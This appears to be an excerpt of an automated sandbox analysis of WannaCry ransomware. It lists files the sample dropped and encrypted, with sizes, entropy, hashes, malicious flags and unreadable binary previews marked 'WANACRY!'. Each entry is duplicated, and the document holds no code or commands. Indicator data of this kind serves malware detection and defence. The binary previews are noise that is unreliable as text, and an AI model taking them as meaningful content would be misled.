                                                                              Preview:WANACRY!......6.GM.3........Q...~D...;..M...I$.l=Sh=qP.y.;.!.A...'..T.yW..3kW...;_....Ti..\!..c..n...>ljBW..\....'.u..V......o.c...MO~&...t.J9.#.j.....g..AZ!.......,XP.".(...l....^-......9............@..".`.?.ZP.5..,.... (.`...2M..y.......ZV.9.JP....a.....w.........).N...m...;.$..%.4..KJMI..V.l..v.d../....%1.X6.(.&3.'.d....;..N..B..A..b..u....B.i...~.I.t.V.iK..&....r..P.i...L..@....I..PX.....a....o..H....'..v.xf....~.0..cm..6.]..e.|.1D.H...t\..].D.k....!.C.2..}$Ti.....]...bP.&f.....B..7.....@...r.P.....%.z.p..W.*`1.).ek..G..R~q................^.).%.. ...4...35.&.......n.CI...j.#........T..n..^_....&9^.6.........Yy|...... %%...,.#............3<....1...i.S.i..-....uja8..o.....e<..]......C.Ey...|7.Q.....^T|..9-9..Nd.j..svB..t...q;?....<..>)7....^F.Q.(.+J0 .|..G......p\...e\.r~...|..)S..8...2..[0..$S..Sd.2..h..f..d...W..p...!..Q|.>.eX.........d#..J.f.9.6.2......l7.^Q.{2....*."..y.2....... ..q.$.Z..3..J.]...o.n.....".....[@,.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):99560
                                                                              Entropy (8bit):7.998442975848279
                                                                              Encrypted:true
                                                                              SSDEEP:1536:CCtgx7uxuLMlfy/QCPo/0PCJIUv1i/qS0JxHL7SgcsQD9Aq+4Ou41ujFR2X6N2uQ:CTLfByJQt0XPF4OHI5R2qRejj
                                                                              MD5:F5623A79CA01CFC8227131E5246E0AE9
                                                                              SHA1:DCD3B4D44877F13A4656FD4D7A206637D0DA6F7A
                                                                              SHA-256:EB948A6DEAA810C033B5B245FFEEB2B2E42314587A69543C0D3D4D24471EF550
                                                                              SHA-512:88BD5F9CE1D4198B764A14E08EDB7B4FDA10F6D049ADC71B03F765DF8B8424801DA4D8D91E76E107EA48B6C8A6553E62607A78C88783B83721D2AA51D357F185
                                                                              Malicious:true
                                                                              Preview:WANACRY!....R60Q..@.V?.u<..C. .7....i...t..e4>.t,.....(..LV..`oFo....U.....7.|l3...V....Q.t1e.....4.9V.JH.......x..(5....Y;_.;....{<.....;.~au..|>~b...\......J..)...(.9.#S."z....Y..._.AK.b..bV#..}B..`9[..gK.{m.&+.w.D...S.9Wjc..q.+...jb......rG....m.ht...........l.N...@.ikD,...?....f...'z\.OD..rP ..W...B..^.E5..S.OC8......S..cNh.H.....@)..u..q...$h....m..j6.W.Kj.\...+FS.:.{^G.h.AFf{@......1*..0!.4....G.k.L.<.r...<...:......7......NS.U.`....X.....%\r=}.,....&..vG...^........8.:..#...1....n.f...0.u..g.}LN..x...?=.v".S.@....6..f.Y.C..h.'`....i.e......e.*.Vk>....S.X.....-P...........p.+..p...#.:p1.....$$Vf..UiD_."l\.VP....m.....~o..'?.]...]..N....#...s.w.B...1.b.._.-.-..n..`/..n...r.#.....3....[.M.>Sk|......[.L....u.hhe..V....=.T_......a.0D.s......v/y>.<.....CJTv.Q..l;.M..........v.."l.4..E.qm5....t..g...{.....$.!.3{.....K.s....)..|.F....8{/.........%.....@^..c.7"...........aY...,.-./...=B7j.9....: +...W...aS4..'Ie..g._.M4:....M.... ..._'.7jw
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):99560
                                                                              Entropy (8bit):7.998442975848279
                                                                              Encrypted:true
                                                                              SSDEEP:1536:CCtgx7uxuLMlfy/QCPo/0PCJIUv1i/qS0JxHL7SgcsQD9Aq+4Ou41ujFR2X6N2uQ:CTLfByJQt0XPF4OHI5R2qRejj
                                                                              MD5:F5623A79CA01CFC8227131E5246E0AE9
                                                                              SHA1:DCD3B4D44877F13A4656FD4D7A206637D0DA6F7A
                                                                              SHA-256:EB948A6DEAA810C033B5B245FFEEB2B2E42314587A69543C0D3D4D24471EF550
                                                                              SHA-512:88BD5F9CE1D4198B764A14E08EDB7B4FDA10F6D049ADC71B03F765DF8B8424801DA4D8D91E76E107EA48B6C8A6553E62607A78C88783B83721D2AA51D357F185
                                                                              Malicious:true
                                                                              Preview:WANACRY!....R60Q..@.V?.u<..C. .7....i...t..e4>.t,.....(..LV..`oFo....U.....7.|l3...V....Q.t1e.....4.9V.JH.......x..(5....Y;_.;....{<.....;.~au..|>~b...\......J..)...(.9.#S."z....Y..._.AK.b..bV#..}B..`9[..gK.{m.&+.w.D...S.9Wjc..q.+...jb......rG....m.ht...........l.N...@.ikD,...?....f...'z\.OD..rP ..W...B..^.E5..S.OC8......S..cNh.H.....@)..u..q...$h....m..j6.W.Kj.\...+FS.:.{^G.h.AFf{@......1*..0!.4....G.k.L.<.r...<...:......7......NS.U.`....X.....%\r=}.,....&..vG...^........8.:..#...1....n.f...0.u..g.}LN..x...?=.v".S.@....6..f.Y.C..h.'`....i.e......e.*.Vk>....S.X.....-P...........p.+..p...#.:p1.....$$Vf..UiD_."l\.VP....m.....~o..'?.]...]..N....#...s.w.B...1.b.._.-.-..n..`/..n...r.#.....3....[.M.>Sk|......[.L....u.hhe..V....=.T_......a.0D.s......v/y>.<.....CJTv.Q..l;.M..........v.."l.4..E.qm5....t..g...{.....$.!.3{.....K.s....)..|.F....8{/.........%.....@^..c.7"...........aY...,.-./...=B7j.9....: +...W...aS4..'Ie..g._.M4:....M.... ..._'.7jw
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):97704
                                                                              Entropy (8bit):7.998072960269906
                                                                              Encrypted:true
                                                                              SSDEEP:1536:p2qzTjEB6Buvwxd7y2lxcgEjskxxraQPin/CdXM4OH5/bL9et9mT0EMIPys/imoA:p2CTjEIpNlx+xx+QP2/YXdq5/bRevmTF
                                                                              MD5:DDD3CB1E5144F49E6253E42985DC89DB
                                                                              SHA1:8558113BF9204FA7FDF41BB555BB73F72A0FF4C3
                                                                              SHA-256:D266C45B3C41FF6C358727A3CC07805AD801486D9806847C0D9E976A3D13BB1E
                                                                              SHA-512:510171BACDD92BAD7678E916423FA3589157CAE92F432D8DA9B5F701244FF1E73BB16BB6242B9D1C01AC09CEAD9C15982DA6D2612634A2B8F10C9AE1FDE224BF
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....C..cA$..,.._...13U.N...w.OD.I...M..x."..3.PWi..J,............&3.fA.T.M0X.....z.i...T.|._.....s....8..=....9(..fa.t..u.j...[~.P...V..x..`.f>~.x....N .......F.../...Pi....6....m.J.!q.(....GpVwX3.`..\...F.c....W$.`.d...y2.fU.7tv._%....j.......;0f:........|......C..........f...U.._...B....."...0;i..BA...~..dU_.n.Q..k..8..k...4...>..8...$..+.[..*..F...-...d...5.+Crs7i...C...l.?.>..>.p-.H.Eu....k..MTT..Ey.[.s.B..OM...d.@..Y....7.7.Z+.vpO..&..y.l}-u..gN..Amkr.'}Q.../......./.a}..\.pF.].u.u.".P..EV...E...a.Z..A]=.e(.<.v...H9(DU.....itj.).);;#=.r.....:l..S......'.....hc.t.3...S)..V.l..>1TNt.k.8..x=..p...B.!.*.f.Cqc..R<)6.....b...D.:zr....j.HZ....:...\..,.%..}.8-`.@J..V..+.#C..........i..%...T.,7q.m ......1z..?.L..};...Tk.8...^'\D.h...O..&.7c..$.p.z.;.".. .Z.@~...8L.;kv..UN..Zq.=e.}..z.._.@.,..)....U.4..3...+..u.K.m...;..g..'sGIa.^d...@...z..:..t.........q..R-.u..c,.'.....Z.@..1rh}A.9..M...."|...]6......G_i.4...9T]$.....J.D..uc.....^.f3.2...1.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):97704
                                                                              Entropy (8bit):7.998072960269906
                                                                              Encrypted:true
                                                                              SSDEEP:1536:p2qzTjEB6Buvwxd7y2lxcgEjskxxraQPin/CdXM4OH5/bL9et9mT0EMIPys/imoA:p2CTjEIpNlx+xx+QP2/YXdq5/bRevmTF
                                                                              MD5:DDD3CB1E5144F49E6253E42985DC89DB
                                                                              SHA1:8558113BF9204FA7FDF41BB555BB73F72A0FF4C3
                                                                              SHA-256:D266C45B3C41FF6C358727A3CC07805AD801486D9806847C0D9E976A3D13BB1E
                                                                              SHA-512:510171BACDD92BAD7678E916423FA3589157CAE92F432D8DA9B5F701244FF1E73BB16BB6242B9D1C01AC09CEAD9C15982DA6D2612634A2B8F10C9AE1FDE224BF
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....C..cA$..,.._...13U.N...w.OD.I...M..x."..3.PWi..J,............&3.fA.T.M0X.....z.i...T.|._.....s....8..=....9(..fa.t..u.j...[~.P...V..x..`.f>~.x....N .......F.../...Pi....6....m.J.!q.(....GpVwX3.`..\...F.c....W$.`.d...y2.fU.7tv._%....j.......;0f:........|......C..........f...U.._...B....."...0;i..BA...~..dU_.n.Q..k..8..k...4...>..8...$..+.[..*..F...-...d...5.+Crs7i...C...l.?.>..>.p-.H.Eu....k..MTT..Ey.[.s.B..OM...d.@..Y....7.7.Z+.vpO..&..y.l}-u..gN..Amkr.'}Q.../......./.a}..\.pF.].u.u.".P..EV...E...a.Z..A]=.e(.<.v...H9(DU.....itj.).);;#=.r.....:l..S......'.....hc.t.3...S)..V.l..>1TNt.k.8..x=..p...B.!.*.f.Cqc..R<)6.....b...D.:zr....j.HZ....:...\..,.%..}.8-`.@J..V..+.#C..........i..%...T.,7q.m ......1z..?.L..};...Tk.8...^'\D.h...O..&.7c..$.p.z.;.".. .Z.@~...8L.;kv..UN..Zq.=e.}..z.._.@.,..)....U.4..3...+..u.K.m...;..g..'sGIa.^d...@...z..:..t.........q..R-.u..c,.'.....Z.@..1rh}A.9..M...."|...]6......G_i.4...9T]$.....J.D..uc.....^.f3.2...1.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.201135553980251
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkE5x7CpBrqV/e+hhzZIJElbh4WyPxBBTcqSSwtszXMUqie1y:bkE5xmpSG+dIJElbtyPLBw/JezXYiN
                                                                              MD5:5F434B7E8004980F1C46960651047518
                                                                              SHA1:D66B15F9821FF5352C825F509BC02CD6202FBC55
                                                                              SHA-256:E19641F9F1F79AB97AC733D646EAB9E63DC4C2F20D59C9EF74DD9E18B860E655
                                                                              SHA-512:E3DEA46504110B22CE1CA6E4027D79BC2794BF2BDC31CCD7189D964039B9EA5A5A796C889698C1614447B7693E5F8BF75542E23F119741C605250094B1B19D19
                                                                              Malicious:false
                                                                              Preview:WANACRY!....Ei...$..'R..T..5.1b..j..!8R..=....1.ge........[<..8m.plp..^..a.m..B..9I...-.1BI.1O}hmD.9.6]..*R."7.<8...k.....:CaP.e...>*X./Xnp.).u....Q.........3.m(.C....G.n.q-.Y.$....c....=-)....yT......s.=..$@:7.1<...lm.....!..M(,....f.....v...[.3....R...............WyX......p;.h........=~.U......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.201135553980251
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkE5x7CpBrqV/e+hhzZIJElbh4WyPxBBTcqSSwtszXMUqie1y:bkE5xmpSG+dIJElbtyPLBw/JezXYiN
                                                                              MD5:5F434B7E8004980F1C46960651047518
                                                                              SHA1:D66B15F9821FF5352C825F509BC02CD6202FBC55
                                                                              SHA-256:E19641F9F1F79AB97AC733D646EAB9E63DC4C2F20D59C9EF74DD9E18B860E655
                                                                              SHA-512:E3DEA46504110B22CE1CA6E4027D79BC2794BF2BDC31CCD7189D964039B9EA5A5A796C889698C1614447B7693E5F8BF75542E23F119741C605250094B1B19D19
                                                                              Malicious:false
                                                                              Preview:WANACRY!....Ei...$..'R..T..5.1b..j..!8R..=....1.ge........[<..8m.plp..^..a.m..B..9I...-.1BI.1O}hmD.9.6]..*R."7.<8...k.....:CaP.e...>*X./Xnp.).u....Q.........3.m(.C....G.n.q-.Y.$....c....=-)....yT......s.=..$@:7.1<...lm.....!..M(,....f.....v...[.3....R...............WyX......p;.h........=~.U......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1048856
                                                                              Entropy (8bit):7.99984409515499
                                                                              Encrypted:true
                                                                              SSDEEP:24576:+NKHZwMO/NthnvzVWGFWDKKdJ8t22CoXg6sn:+NKHZlArA00JM22LPq
                                                                              MD5:1FCFC6B4C00B7FC2562EE873023FD65A
                                                                              SHA1:E337ACE0995DCB19E995C57247A14B7755CE9759
                                                                              SHA-256:1BA1EA063F300591D5B5D6D1CC7323DCABA6126F7AF851B7E0397FDC4533A6A5
                                                                              SHA-512:8F52B46815F30F4EC06FDA6129B6BE64FE4B84A3FDAC61B8D24E7565154A2291117D11615606125658247BE0A083B8F67B57F9158DE693053BB8A87B02C05972
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......$..}8[.Rw^.)_`..k..lX.*..v(.....yRkYV........x..-.V.....u>....X3..f..w-............_R4|.12....]B3n...<.e7..G....Zw.a.L..@G1...~../S...M.~.../...=[...N.....b......j.*md.I......e....Lju@C.N....`i`.Z=.......g^.^i..5W.6.........J.z.+...^.8...n.............,x.G..#.o.k.v..n#.Y....b,W2.\4...3H.6.M....Q..c.<......&.B.R.......~v....q..t...+M.f.!1.`..Y.3l.n....X.....s.=.:.kkk....%..S!k.....3\._s.i").^.A....qX/..9.K.#.^...UT......`..'S.f....V_..p......../^...i...C....m.ZJ....%..^......r{..O').*.\.......<2.P..72......v..L.{.+......u..j3#..?Q-..BI4.[hu`.*..c.NTo.C.=n..o.o.Y+..%........|mh..1..Ed.y....l5'..Re.........z..".~.\.L.0..........;.3..O....V...DE.n...%6z....}.{....-..J}o..[...l.-a.M.X._.A.-......^<..`W...'l..2..RbDE..!Pq/Q.+Z.tTI...aoLS.y{.1..2...6.e..Z.J.7j.6U.z.jA...9..T`.LiW..(=...K.x......3L0S...b.........d.....i...{..S ..+..!....*9.s.... .Kg..|.C.J.Ed.gX.ia.c.....D....$%..;..(.oN.:.....*..J..n..au-.B.W..Q.......!.u.}\..8...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1048856
                                                                              Entropy (8bit):7.99984409515499
                                                                              Encrypted:true
                                                                              SSDEEP:24576:+NKHZwMO/NthnvzVWGFWDKKdJ8t22CoXg6sn:+NKHZlArA00JM22LPq
                                                                              MD5:1FCFC6B4C00B7FC2562EE873023FD65A
                                                                              SHA1:E337ACE0995DCB19E995C57247A14B7755CE9759
                                                                              SHA-256:1BA1EA063F300591D5B5D6D1CC7323DCABA6126F7AF851B7E0397FDC4533A6A5
                                                                              SHA-512:8F52B46815F30F4EC06FDA6129B6BE64FE4B84A3FDAC61B8D24E7565154A2291117D11615606125658247BE0A083B8F67B57F9158DE693053BB8A87B02C05972
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......$..}8[.Rw^.)_`..k..lX.*..v(.....yRkYV........x..-.V.....u>....X3..f..w-............_R4|.12....]B3n...<.e7..G....Zw.a.L..@G1...~../S...M.~.../...=[...N.....b......j.*md.I......e....Lju@C.N....`i`.Z=.......g^.^i..5W.6.........J.z.+...^.8...n.............,x.G..#.o.k.v..n#.Y....b,W2.\4...3H.6.M....Q..c.<......&.B.R.......~v....q..t...+M.f.!1.`..Y.3l.n....X.....s.=.:.kkk....%..S!k.....3\._s.i").^.A....qX/..9.K.#.^...UT......`..'S.f....V_..p......../^...i...C....m.ZJ....%..^......r{..O').*.\.......<2.P..72......v..L.{.+......u..j3#..?Q-..BI4.[hu`.*..c.NTo.C.=n..o.o.Y+..%........|mh..1..Ed.y....l5'..Re.........z..".~.\.L.0..........;.3..O....V...DE.n...%6z....}.{....-..J}o..[...l.-a.M.X._.A.-......^<..`W...'l..2..RbDE..!Pq/Q.+Z.tTI...aoLS.y{.1..2...6.e..Z.J.7j.6U.z.jA...9..T`.LiW..(=...K.x......3L0S...b.........d.....i...{..S ..+..!....*9.s.... .Kg..|.C.J.Ed.gX.ia.c.....D....$%..;..(.oN.:.....*..J..n..au-.B.W..Q.......!.u.}\..8...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.228399664575926
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEU6LvqSHAttzvOpIRTSn53cSyGxH6Cy9ege+hd+YKkRR79EKtqhaWhWp:bkE/LDavt+53cSyOyNey+YDLE3nc
                                                                              MD5:639DFB7E97E4BA4F822E3ED1D1653D4A
                                                                              SHA1:C6218551FE15A6D80C673A7925E86AEE7885D203
                                                                              SHA-256:567D3867CF6A01F488E8B22B740ABFCD5A0295BB16C419C37E24ACDED314C13F
                                                                              SHA-512:E85DDA959E9A9BF4A957CDF5B118B4457C5C3A154BF13A86E6AC5DBEC93E4B0F30451E9087F18620030030A9F6CDD9A02464EAA323502154EA08A91B457A2E6E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....s....ca`.A..>...i.V.8..k....<.)2..t....=../..X.5.O..-z..+.6@K...F..OfD8".....$..)(R.%...{...I..y..#`i..wU.r.ECY....p.D0.r9.@......NF5......z....(6.1..uC.....F...`.W.6s..}*s.X...a.J2u.i2C.N...@............H..... .5C.}.ZI:\.0..b'...E.D).OQ.n..............F..%_.wj..Z...f.....?H.jT\..s.%
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.228399664575926
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEU6LvqSHAttzvOpIRTSn53cSyGxH6Cy9ege+hd+YKkRR79EKtqhaWhWp:bkE/LDavt+53cSyOyNey+YDLE3nc
                                                                              MD5:639DFB7E97E4BA4F822E3ED1D1653D4A
                                                                              SHA1:C6218551FE15A6D80C673A7925E86AEE7885D203
                                                                              SHA-256:567D3867CF6A01F488E8B22B740ABFCD5A0295BB16C419C37E24ACDED314C13F
                                                                              SHA-512:E85DDA959E9A9BF4A957CDF5B118B4457C5C3A154BF13A86E6AC5DBEC93E4B0F30451E9087F18620030030A9F6CDD9A02464EAA323502154EA08A91B457A2E6E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....s....ca`.A..>...i.V.8..k....<.)2..t....=../..X.5.O..-z..+.6@K...F..OfD8".....$..)(R.%...{...I..y..#`i..wU.r.ECY....p.D0.r9.@......NF5......z....(6.1..uC.....F...`.W.6s..}*s.X...a.J2u.i2C.N...@............H..... .5C.}.ZI:\.0..b'...E.D).OQ.n..............F..%_.wj..Z...f.....?H.jT\..s.%
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):3146008
                                                                              Entropy (8bit):7.999945863973171
                                                                              Encrypted:true
                                                                              SSDEEP:49152:jVxFo8DrqUrdQu0r4Elakuj4x4/zhcBCWI31HQ5JDdkFOSuxM6540TTP2aW:jV08DPrQlW4etcBfI3e5x6ObdK4P2z
                                                                              MD5:789D8B3515A1713A14A35D9C088AA46F
                                                                              SHA1:11DD216C4B375D4E4B6C43A027BEB61163DB178E
                                                                              SHA-256:44D48AA7E7DD2197EE4EF593749F071608B6F999A3DE721DF53323361A1810EF
                                                                              SHA-512:81AC2CB7320915DCCAB870BEC59DC66D68A37014EE65449C2B1CF817F1E57802A332011E7B5C3E41F3FEC96975C89D3B2CA08CE3FE0847FCA57E0E93F45497CB
                                                                              Malicious:true
                                                                              Preview:WANACRY!....WF..2..N.k..g)...7.......Y/.;/..`aw....Y.........r^G.......*.<....C....n..K.y..jc!k.G..i[..,..i3.O]t...DSt.Au..&.V.sk3..lj.$>|.I.;.".....{7...,!./yK.$........S...r.ssN.....N..,Y.F.^. ..e6.Q.x....D;.#.a......T..~Y..p....Lu..v../..N......4.......0.....$g..2...1.emx....n..T.C.....f,O.......Y.3O0.}...E.......*=<i......-x..T...ovs....f.t_..-. he1.~...{..T.+F.4.M......Ib..8........,.%..).... .L K....$;.......N.|.W.....v. ~UC]....-..i..?..tnjZ.c..E...,....^.,.ZE.9..f..e...0....p.%...v~.B.D$...0\..z.X."Bt.$.Py`...E.Y+...AO....xR,......OP0.....Iv..W./.#..^..a.A%.Gp.X.L..F.X..H.N.&....f..&..6.Pn&.....}..........>....;._...N......6...9.4....\.U.....4..5R(.[....C...=..<P..sBm.O.4=..m....w....q...).|.MV......OV.J.....}/..M.Z..s...S...~..\.x3APD,?.2A0R....{Vxx..l1y..e..6{/..F...K@f..J@..._j.\!..L+~.|t"..w.8K.a..]..8<.._....O.&z....,.|..1..C.?..!..Z.h......:nf. ..y..i...>RD.....o/].%G.B.....@+Mgeuk.......,.;...\...:.>.4.y.PK&........v.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):3146008
                                                                              Entropy (8bit):7.999945863973171
                                                                              Encrypted:true
                                                                              SSDEEP:49152:jVxFo8DrqUrdQu0r4Elakuj4x4/zhcBCWI31HQ5JDdkFOSuxM6540TTP2aW:jV08DPrQlW4etcBfI3e5x6ObdK4P2z
                                                                              MD5:789D8B3515A1713A14A35D9C088AA46F
                                                                              SHA1:11DD216C4B375D4E4B6C43A027BEB61163DB178E
                                                                              SHA-256:44D48AA7E7DD2197EE4EF593749F071608B6F999A3DE721DF53323361A1810EF
                                                                              SHA-512:81AC2CB7320915DCCAB870BEC59DC66D68A37014EE65449C2B1CF817F1E57802A332011E7B5C3E41F3FEC96975C89D3B2CA08CE3FE0847FCA57E0E93F45497CB
                                                                              Malicious:true
                                                                              Preview:WANACRY!....WF..2..N.k..g)...7.......Y/.;/..`aw....Y.........r^G.......*.<....C....n..K.y..jc!k.G..i[..,..i3.O]t...DSt.Au..&.V.sk3..lj.$>|.I.;.".....{7...,!./yK.$........S...r.ssN.....N..,Y.F.^. ..e6.Q.x....D;.#.a......T..~Y..p....Lu..v../..N......4.......0.....$g..2...1.emx....n..T.C.....f,O.......Y.3O0.}...E.......*=<i......-x..T...ovs....f.t_..-. he1.~...{..T.+F.4.M......Ib..8........,.%..).... .L K....$;.......N.|.W.....v. ~UC]....-..i..?..tnjZ.c..E...,....^.,.ZE.9..f..e...0....p.%...v~.B.D$...0\..z.X."Bt.$.Py`...E.Y+...AO....xR,......OP0.....Iv..W./.#..^..a.A%.Gp.X.L..F.X..H.N.&....f..&..6.Pn&.....}..........>....;._...N......6...9.4....\.U.....4..5R(.[....C...=..<P..sBm.O.4=..m....w....q...).|.MV......OV.J.....}/..M.Z..s...S...~..\.x3APD,?.2A0R....{Vxx..l1y..e..6{/..F...K@f..J@..._j.\!..L+~.|t"..w.8K.a..]..8<.._....O.&z....,.|..1..C.?..!..Z.h......:nf. ..y..i...>RD.....o/].%G.B.....@+Mgeuk.......,.;...\...:.>.4.y.PK&........v.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.2368574995819435
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEdgOnpxvM5lt8il/vikpxHJk0tVTVROYndpIEtW3Tu2/oJ:bkEVnXvril/KkfpxnZ9dpIEk3Tu2w
                                                                              MD5:4F903B5A7DD266E4A3EB509B40C1F75C
                                                                              SHA1:5315C852D7DA88959A39957880C76770E573009B
                                                                              SHA-256:44BBA530CBD451D6215CFB6A9378C8ADCB9BFEE27406173A198202244C9297AB
                                                                              SHA-512:53544C0636D6979A0C037BE48BE10901B976D40D1EC67B25D8D5E19459D634260D2B4241B972EFBAC66985A36BAE0BB475C511D33D8542290F4EC295A9CDCAA7
                                                                              Malicious:false
                                                                              Preview:WANACRY!......xPxMS....q....9.}[n....Z..."...3..Z.....}p0..R.<.g.d3..\...aC.rc.e...N.i.T.B.P..3....Dr....>......@..........y.a.A.r3)..d.........E...x.e...........$.O..4Q...G.Y....Ty=p......+..+,.x.....,].%.j..b..#.%.s~+9...rJ...n..)j.}..!.7.*.53.v..............}..('S..Y.~._...\....Z....K.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.2368574995819435
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEdgOnpxvM5lt8il/vikpxHJk0tVTVROYndpIEtW3Tu2/oJ:bkEVnXvril/KkfpxnZ9dpIEk3Tu2w
                                                                              MD5:4F903B5A7DD266E4A3EB509B40C1F75C
                                                                              SHA1:5315C852D7DA88959A39957880C76770E573009B
                                                                              SHA-256:44BBA530CBD451D6215CFB6A9378C8ADCB9BFEE27406173A198202244C9297AB
                                                                              SHA-512:53544C0636D6979A0C037BE48BE10901B976D40D1EC67B25D8D5E19459D634260D2B4241B972EFBAC66985A36BAE0BB475C511D33D8542290F4EC295A9CDCAA7
                                                                              Malicious:false
                                                                              Preview:WANACRY!......xPxMS....q....9.}[n....Z..."...3..Z.....}p0..R.<.g.d3..\...aC.rc.e...N.i.T.B.P..3....Dr....>......@..........y.a.A.r3)..d.........E...x.e...........$.O..4Q...G.Y....Ty=p......+..+,.x.....,].%.j..b..#.%.s~+9...rJ...n..)j.}..!.7.*.53.v..............}..('S..Y.~._...\....Z....K.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2097432
                                                                              Entropy (8bit):7.999922766380724
                                                                              Encrypted:true
                                                                              SSDEEP:49152:L5h65iU0pLvemxqy25e9ZZCHEcDdfc/0Ikle8YJE:3Vp6OEALYtUP8YJE
                                                                              MD5:E385CB9DC41F51C17B7ADD94EE52E69E
                                                                              SHA1:9F15286724BCE391A0FECF9DD18A4CC60C84911D
                                                                              SHA-256:E2B9E760B30B2B4E6798A077FBC227032AD818F102F92E0A8645F52DD62B73EB
                                                                              SHA-512:42154B01EBA72AEF04260736F039F39A326FAD2372ABE9D887835ADE9DABD6A0C28701BABFDA8287386A8A46BD43FB1A5065A52E6A51BCE6988AB66670E42681
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....:3...D%.4.r|...:^.1.%m.+.V...F.SW.#.D.......O[v.c.V'...n....*T...).N.iWX.....C..Pz...c@..g....G..h.....;_.ZP....K."I.N.uK...y7....-...5..r:2....t.O.]2....#0.[...l.J$GB..<G.T.......[..XW.a.......7..^.....P..P4..!. .4.....&....,%.S..Z+...h........ ...... ...G.7..F.B1(.m.}9.....K...w[..n.jW.........i..u0.....?.h...|.......(...u*....r{.....d.Y.k....F....3..U.4...O...-_..F7T.'..%..jeM...V..v:}...<..W....c.5....|....O...z.g.....9Q2'.qwC......3.<..p...u.......8...OR..<Z...I......{..<u5h.%....'H....qB9......GK....{K....D.~T...h.n.>"U.y.\.........*...<L^.Uh..~>2.\.b.{$e.......^...d...U..2...P...).."A.9#.K...b..e..m......M.K7..bl.U\6.<...z.p!%..9.uB5<..M.T(.~...Q...v..|.ua.S).*...BH.tY....Nf....(.5........z.A).....o=L.]..|....~$..R..6ET...b....h6,.FYCd....S.2..h...uv2....0...s...TN..]n..........D.KH|.qA...4..R.@..................4.4.#-./u.)..V.@....K .2..(.*.J.....q.c..!.6...N]^._#.2...^.yFN.....H...E.....I.zT-b..n.E...d}^.f...n.$o0..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2097432
                                                                              Entropy (8bit):7.999922766380724
                                                                              Encrypted:true
                                                                              SSDEEP:49152:L5h65iU0pLvemxqy25e9ZZCHEcDdfc/0Ikle8YJE:3Vp6OEALYtUP8YJE
                                                                              MD5:E385CB9DC41F51C17B7ADD94EE52E69E
                                                                              SHA1:9F15286724BCE391A0FECF9DD18A4CC60C84911D
                                                                              SHA-256:E2B9E760B30B2B4E6798A077FBC227032AD818F102F92E0A8645F52DD62B73EB
                                                                              SHA-512:42154B01EBA72AEF04260736F039F39A326FAD2372ABE9D887835ADE9DABD6A0C28701BABFDA8287386A8A46BD43FB1A5065A52E6A51BCE6988AB66670E42681
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....:3...D%.4.r|...:^.1.%m.+.V...F.SW.#.D.......O[v.c.V'...n....*T...).N.iWX.....C..Pz...c@..g....G..h.....;_.ZP....K."I.N.uK...y7....-...5..r:2....t.O.]2....#0.[...l.J$GB..<G.T.......[..XW.a.......7..^.....P..P4..!. .4.....&....,%.S..Z+...h........ ...... ...G.7..F.B1(.m.}9.....K...w[..n.jW.........i..u0.....?.h...|.......(...u*....r{.....d.Y.k....F....3..U.4...O...-_..F7T.'..%..jeM...V..v:}...<..W....c.5....|....O...z.g.....9Q2'.qwC......3.<..p...u.......8...OR..<Z...I......{..<u5h.%....'H....qB9......GK....{K....D.~T...h.n.>"U.y.\.........*...<L^.Uh..~>2.\.b.{$e.......^...d...U..2...P...).."A.9#.K...b..e..m......M.K7..bl.U\6.<...z.p!%..9.uB5<..M.T(.~...Q...v..|.ua.S).*...BH.tY....Nf....(.5........z.A).....o=L.]..|....~$..R..6ET...b....h6,.FYCd....S.2..h...uv2....0...s...TN..]n..........D.KH|.qA...4..R.@..................4.4.#-./u.)..V.@....K .2..(.*.J.....q.c..!.6...N]^._#.2...^.yFN.....H...E.....I.zT-b..n.E...d}^.f...n.$o0..
